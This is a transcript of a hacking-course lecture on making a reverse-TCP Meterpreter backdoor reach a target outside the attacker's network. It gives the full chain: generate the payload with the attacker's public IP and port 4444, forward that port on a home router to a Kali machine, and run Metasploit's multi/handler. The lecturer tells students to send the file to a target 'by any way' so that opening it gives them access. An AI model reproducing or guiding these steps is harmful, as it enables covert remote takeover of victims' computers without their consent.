Hello everyone. This lecture will be the one before the last. In this lecture I'd like to show you how to let the backdoor you have generated to work outside of your network. Let me show you the steps. So if we go to vil to generate a virus or to generate a backdoor, so as usual we'll use one, then we'll see the list. Let me take just 7 for example. This is a simple one. Reverse TCP. So we'll tell you 7. After that we'll set the L host and L port. Set L host. This IP should be your public IP, not your Kali Linux IP. So to check your public IP, just go to your web browser and write what's my IP, and this website, what's my IP address. So this is your public IP. Just you need to copy this. You need to copy this as is and put it in Kali Linux. Here, this is the L host. Previously we were using Kali Linux IP. That was because we want the backdoor to work in our network, but since we want this backdoor to work outside of our network, we need to use our public IP. Then we need to set the L port. We can keep it 444 or we can use anything else. So let's say we'll use 4444 as is. Okay, then generate. Enter. We'll give it any name. Let's call it outside. Now after generating this one, we need to configure our router to forward any requests comes to 4444 ports to Kali Linux machine. So let's do it. Let me show you my router. Every router has a different way to enable IP forwarding. So let me show you my router. So if we go to web browser again, connection settings, under virtual server, under security, under virtual server, you need to add any name, then the port you want to receive the connections from outside to. This is the IP of Kali Linux machine. So if we go to Kali Linux by ifconfig, it's 192.168.8.105. so we'll use it here, and we'll put the same port for LAN, and the protocol is TCP, and the status on, then OK. Now my router is ready to receive connections from outside. If I send this generated backdoor to my target PC through any media or by any way, once he opened the file or once he opened the backdoor, the connection will come to my router and my router will forward it to my Kali machine. So now if we press apply, OK, we can go to Kali Linux and run Metasploit framework, and here we'll use the same method as usual. Just we need to listen to the Kali Linux IP, not to the public IP. So as usual we'll use exploit multi-handler. So here use exploit multi-handler. Then we'll set the payload to be reverse TCP. Windows meterpreter. Then reverse TCP, as we have seen in vil here, reverse TCP. Then we'll show options, and we'll set the L host to Kali machine host. So 192.168.8.105. and the port is as is. So if we show options again, now it's ready. Now we can write exploit, and if the target open this file, you are gonna gain the access. Now if your router was different from my router, just you can Google how to enable IP forwarding. Just go to a browser and write IP forwarding and put the model of your router. So for me, I'm using Huawei, and if you click on system, you can find the device information. This is my model, and for you, just you can search for IP forwarding and keep your model.